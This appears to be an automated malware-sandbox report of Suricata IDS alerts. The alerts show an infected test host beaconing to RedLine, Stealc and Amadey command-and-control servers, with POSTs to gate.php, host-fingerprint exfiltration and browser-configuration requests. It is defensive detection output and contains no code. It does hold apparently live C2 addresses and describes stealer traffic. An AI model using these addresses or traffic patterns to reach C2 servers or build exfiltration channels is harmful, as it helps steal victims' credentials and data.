Source: Network traffic	Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.10:49987 -> 185.81.68.147:1912
Source: Network traffic	Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 185.81.68.147:1912 -> 192.168.2.10:49987
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:49989 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:49989 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:49989 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:49996 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:49996 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:49996 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:49998 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:49998 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:49998 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.10:49999 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50008 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50008 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50008 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50011 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50011 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50011 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.81.68.147:1912 -> 192.168.2.10:49987
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50017 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50017 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50017 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50021 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50021 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50021 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50030 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50030 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50030 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.10:50024 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.10:50024 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.10:50024
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.10:50035 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50036 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50036 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50036 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.10:50024 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50034 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50034 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50034 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.10:50024
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50038 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50038 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50038 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.10:50024 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50040 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50040 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50040 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50041 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50041 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50041 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50043 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50043 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50043 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50045 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50045 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50045 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.10:50047 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50048 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50048 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50048 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50060 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50060 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50060 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50061 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50061 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50061 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50064 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50064 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50064 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50050 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50050 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50050 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.10:50063 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50067 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50067 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50067 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50068 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50068 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50068 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50070 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50070 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50070 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50071 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50071 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50071 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50075 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50075 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50075 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50072 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50072 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50072 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.10:50078 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50080 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50080 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50080 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50091 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50091 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50091 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50085 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50085 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50085 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50104 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50104 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50104 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50120 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50120 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50120 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50076 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50076 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50076 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50124 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50124 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50124 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50127 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50127 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50127 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50128 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50128 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50128 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50131 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50131 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50131 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50134 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50134 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50134 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50136 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50136 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50136 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50139 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50139 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50139 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50141 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50141 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50141 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50146 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50148 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50148 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50148 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50146 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50146 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50156 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50156 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50156 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50150 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50147 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50150 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50147 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50147 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50165 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50150 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50176 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50176 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50176 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50192 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50192 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50192 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50165 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50165 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50184 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50184 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50184 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50182 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50182 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50182 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50195 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50195 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50195 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50164 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50164 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50164 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50174 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50174 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50174 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50202 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50202 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50202 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50196 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50196 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50196 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50221 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50233 -> 185.81.68.147:80
